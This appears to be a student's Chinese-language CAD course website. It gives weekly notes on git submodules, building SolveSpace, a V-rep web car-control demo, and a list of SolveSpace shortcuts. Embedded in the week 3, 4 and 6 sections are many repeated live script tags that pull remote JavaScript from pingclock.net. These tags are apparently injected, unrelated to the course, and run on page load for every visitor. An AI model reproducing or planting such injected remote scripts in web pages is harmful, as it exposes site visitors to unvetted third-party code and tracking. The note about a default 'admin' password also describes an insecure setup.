<h1>weeks</h1>
<h2>week2~5</h2>
<p>先建立github倉儲，在clone到自己的隨身系統</p>
<p>1.加入擊建立課程倉儲(cad2019)到近端上</p>
<p>2.用git submodule add之指令</p>
<p>3.要快速開啟近端時只要進入cmsimde，就能夠開啟python </p>
<p>4.開啟python，就可以開啟自己網站進行修改</p>
<p>5.修改完就可以commite push 即完成</p>
<p><iframe allowfullscreen="allowfullscreen" height="314" src="//www.youtube.com/embed/nKEyDM4F4O8" width="560"></iframe></p>
<p>week3</p>
<p>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_830887649&amp;key=21db1c5c8b372aecca&amp;cv=1570179957&amp;t=1570179957561" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_588577456&amp;key=21db1c5c8b372aecca&amp;cv=45546&amp;t=1570179957561" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_333764926&amp;key=21db1c5c8b372aecca&amp;cv=1570197487&amp;t=1570197487758" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_33959987&amp;key=21db1c5c8b372aecca&amp;cv=46302&amp;t=1570197487759" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_913984718&amp;key=21db1c5c8b372aecca&amp;cv=1570197521&amp;t=1570197520863" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_672821633&amp;key=21db1c5c8b372aecca&amp;cv=46336&amp;t=1570197520863" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_303483897&amp;key=21db1c5c8b372aecca&amp;cv=1570197712&amp;t=1570197712703" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_630222057&amp;key=21db1c5c8b372aecca&amp;cv=46527&amp;t=1570197712704" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_102122124&amp;key=21db1c5c8b372aecca&amp;cv=1570203493&amp;t=1570203493613" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_111608965&amp;key=21db1c5c8b372aecca&amp;cv=47504&amp;t=1570203493613" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_493117405&amp;key=21db1c5c8b372aecca&amp;cv=1570203939&amp;t=1570203939293" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_544698546&amp;key=21db1c5c8b372aecca&amp;cv=46298&amp;t=1570203939293" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_111271090&amp;key=21db1c5c8b372aecca&amp;cv=1571327008&amp;t=1571327008380" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_67675162&amp;key=21db1c5c8b372aecca&amp;cv=46388&amp;t=1571327008380" type="text/javascript"></script>
</p>
<p>1.先將<span>Y:\portablegit\bin\sh.exe 改名為 sh_rename_for_solvespace.exe</span></p>
<p>2.<span> 打指令git clone </span><span>--recurse-submodules</span></p>
<p><span>3.到untitle編輯cmakelist內之<span style="color: #ff0000;">713</span>及<span style="color: #ff0000;">714</span>行(加入#字號)</span></p>
<p>4.進入資料夾<span>cd solvespace&gt;cd extlib&gt;cd libpng&gt;mkdir build&gt;cd build</span></p>
<p><span>5.執行<span style="color: #ff0000;">cmake .. -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release</span><br/><span style="color: #ff0000;">mingw32-make</span></span></p>
<p>6.找到檔案<span><span style="color: #ff0000;"> libpng.dll.a</span> 更名, 更名名為<span style="color: #ff0000;"> libpng_static.a</span></span></p>
<p><span>7.回到 solvespace 目錄,建立 build 目錄後進入 build 資料夾</span></p>
<p><span>8.在執行指令cmake .. -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release<br/><span>mingw32-make</span></span></p>
<p><span><span><iframe allowfullscreen="allowfullscreen" height="314" src="//www.youtube.com/embed/Jj0v_tqNkfQ" width="560"></iframe></span></span></p>
<p><span><span></span></span>week4</p>
<p>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_45524232&amp;key=21db1c5c8b372aecca&amp;cv=1570182840&amp;t=1570182840539" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_16210254&amp;key=21db1c5c8b372aecca&amp;cv=46024&amp;t=1570182840539" type="text/javascript"></script>
</p>
<p>1.對網站做更新</p>
<p>2.上傳影片</p>
<p>3.我是用shareX來錄影</p>
<p>4.運用acttime來上字幕</p>
<p>week5</p>
<p>練習solvespace基本操作</p>
<p>在一個正方形上學會定點，讓其保持水平垂直，且在其中三面作圖</p>
<p>主要重點:</p>
<p>(1)繪製正方形，並幫其定尺寸</p>
<p>(2)把正方形換成正方體，並定其厚度</p>
<p>(3)在正方體上，選取一點兩線，設置新的NEW GROUP</p>
<p>(4)在新的繪圖面定中心點(指令<span style="color: #ff0000;">M</span>)</p>
<p>(5)在繪製圓形，再將以設好的點打指令<span style="color: #ff0000;">H<span style="color: #000000;">及</span>V</span>訂好水平及垂直</p>
<p><iframe allowfullscreen="allowfullscreen" height="314" src="//www.youtube.com/embed/-CkVdOC1xAg" width="560"></iframe></p>
<h2>week6~9</h2>
<p><span>(1)下載</span><span> </span><span style="color: #ff0000;"><a href="https://drive.google.com/file/d/1cZFSsLEoGOBYojzKzFEf4YH2l--pbS-9/view?usp=sharing" style="color: #ff0000;">V-rep 3.6.1 rev 4.7z</a></span><span> 及<span style="color: #ff0000;"><a href="https://github.com/mdecourse/mocad/files/3583773/web_vrep2.zip" style="color: #ff0000;">web_vrep2.zip</a> (<a href="http://mde.tw/cad2019/downloads/web_vrep2.zip" style="color: #ff0000;">local</a>)</span>並解壓縮到隨身碟</span></p>
<p><span>(2)打開<span style="color: #ff0000;">web_vrep2</span>裡的<span style="color: #ff0000;">app.py</span>並執行，進入到<span style="color: #ff0000;">http://127.0.0.1:5000/</span></span></p>
<p>(3)打開vrep.exe並開啟web_vrep2裡的two_wheeler.ttt車子檔案</p>
<p><span><span><span>(4)按開始之後，就可以利用運用控制器的前後左右測試是否可以控制車子</span></span></span></p>
<p><span><span><span>任務一網際 V-rep 模型控制</span></span></span></p>
<p><span><span><span><iframe allowfullscreen="allowfullscreen" height="314" src="//www.youtube.com/embed/MlqCnUqqL-o" width="560"></iframe></span></span></span></p>
<p>W6 任務一參數化零組件繪製</p>
<p><span>自己畫車子</span></p>
<p><span><iframe allowfullscreen="allowfullscreen" height="314" src="//www.youtube.com/embed/6bUheCivNE0" width="560"></iframe></span></p>
<p>(1)先繪製車身，<span>並且輸入其安裝輪軸時的長度及車身的長度</span></p>
<p>(2)在加上輪胎，<span>繪製一圓圈(使用指令<span style="color: #ff0000;">c</span>)作為輪胎，加上尺寸，訂好圓心就行</span></p>
<p><span>(3)加上車子擋板，直接在正面設一個NEW Group 在繪製兩個長方形在長出即可</span></p>
<p>成品圖:</p>
<p><img alt="" height="422" src="/images/車車.PNG" width="517"/></p>
<p>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_539683407&amp;key=21db1c5c8b372aecca&amp;cv=1570197209&amp;t=1570197209314" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_10392018&amp;key=21db1c5c8b372aecca&amp;cv=47861&amp;t=1570197209314" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lat?jsonp=__mtz_cb_370705766&amp;key=21db1c5c8b372aecca&amp;cv=1570197469&amp;t=1570197469194" type="text/javascript"></script>
<script src="https://pingclock.net/optout/set/lt?jsonp=__mtz_cb_121146339&amp;key=21db1c5c8b372aecca&amp;cv=46284&amp;t=1570197469196" type="text/javascript"></script>
</p>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
<h2>week10~14</h2>
<h1>note</h1>
<p>solvespace會使用到的快捷鍵</p>
<p>以下快捷鍵:</p>
<p><span>equal length/radius/angle</span><span> </span><span>(Q)</span></p>
<p><span>split line <span>(I)</span></span></p>
<p><span><span>sketch line segment </span>(S)</span></p>
<p><span><span>constrain distance </span><span>(D)</span></span></p>
<p><span><span>sketch rectangle <span>(R)</span></span></span></p>
<p><span><span><span></span></span></span><span><span><span>nearest isometric view </span>(F3) </span></span></p>
<p><span><span>sketch circle<span> (C)</span></span></span></p>
<p><span><span><span>align view to workplane </span>(W) </span></span></p>
<p><span>constrain angle (N)</span></p>
<p><span><span><span><span>extrude</span> (shift+X)</span></span></span></p>
<p><span><span><span>比較<span style="color: #ff0000;">常使用</span>的快捷鍵:</span></span></span></p>
<p><span><span><span>tangent arc <span>(shift+A)</span></span></span></span></p>
<p><span><span><span><span>benchmark <span>(P)</span></span></span></span></span></p>
<p><span>sketh arc of a circle </span><span>(A)</span></p>
<p><span><span>sketh cubic bezier spline </span><span>(B)</span></span></p>
<p><span><span><span></span></span></span><span><span>verticel</span> (V)</span></p>
<p><span><span>horizontal </span>(H)</span></p>
<p><span>two line symmetry </span><span>(Y)</span></p>
<p><span>two line parallel <span>(L)</span></span></p>
<p><span>two line perpencudilar<span> ([)</span></span></p>
<p><span><span>same direction </span>(X)</span></p>
<p><span><span>benchmark </span><span>(P)</span></span></p>
<p><span style="color: #ff0000;">翻譯版</span></p>
<p>等長/半徑/角度（Q）</p>
<p>分割線（I）</p>
<p>草圖線段（S）</p>
<p>約束距離（D）</p>
<p>草圖矩形（R）</p>
<p>最近的等軸測圖（F3）</p>
<p>素描圈（C）</p>
<p>將視圖與工作平面對齊（W）</p>
<p>約束角（N）</p>
<p>擠出（Shift + X）</p>
<p>比較常使用的快捷鍵：</p>
<p>切線弧度（shift + A）</p>
<p>基準（P）</p>
<p>圓的圓弧（A）</p>
<p>sketh三次貝塞爾曲線樣條（B）</p>
<p>垂直（V）</p>
<p>水平（H）</p>
<p>兩線對稱（Y）</p>
<p>兩線平行（L）</p>
<p>兩線垂直（[]</p>
<p>相同方向（X）</p>
<p>基準（P）</p><h1>About</h1>
<p>此內容管理系統以 <a href="https://github.com/mdecourse/cmsimde">https://github.com/mdecourse/cmsimde</a> 作為 submodule 運作, 可以選定對應的版本運作, cmsimde 可以持續改版, 不會影響之前設為 submodule, 使用舊版 cmsimde 模組的內容管理相關運作.</p>
<h4>利用 cmsimde 建立靜態網誌方法:</h4>
<p>1. 在 github 建立倉儲, git clone 到近端</p>
<p>2. 參考 <a href="https://github.com/mdecourse/newcms">https://github.com/mdecourse/newcms</a>, 加入除了 cmsimde 目錄外的所有內容</p>
<p>以 git submodule add <a href="https://github.com/mdecourse/cmsimde">https://github.com/mdecourse/cmsimde</a> cmsimde</p>
<p>建立 cmsimde 目錄, 並從 github 取下子模組內容.</p>
<p>3.在近端維護時, 更換目錄到倉儲中的 cmsimde, 以 python wsgi.py 啟動近端網際伺服器.</p>
<p>動態內容編輯完成後, 以 generate_pages 轉為靜態內容, 以 git add commit 及 push 將內容推到遠端.</p>
<p>4. 之後若要以 git clone 取下包含 submodule 的所有內容, 執行:</p>
<p>git clone --recurse-submodules <a href="https://github.com/mdecourse/newcms.git">https://github.com/mdecourse/newcms.git</a></p>
<h1>Develop</h1>
<p><a href="https://github.com/mdecourse/cmsimde">https://github.com/mdecourse/cmsimde</a> 的開發, 可以在一個目錄中放入 cmsimde, 然後將 up_dir 中的內容放到與 cmsimde 目錄同位階的地方, 使用 command 進入 cmsimde 目錄, 執行 python wsgi.py, 就可以啟動, 以瀏覽器 https://localhost:9443 就可以連接, 以 admin 作為管理者密碼, 就可以登入維護內容.</p>
<p>cmsimde 的開發採用 Leo Editor, 開啟 cmsimde 目錄中的 cmsimde.leo 就可以進行程式修改, 結束後, 若要保留網際內容, 只要將 cmsimde 外部的內容倒回 up_dir 目錄中即可後續對 cmsimde 遠端倉儲進行改版.</p>
<p>init.py 位於  up_dir 目錄, 可以設定 site_title 與 uwsgi 等變數.</p>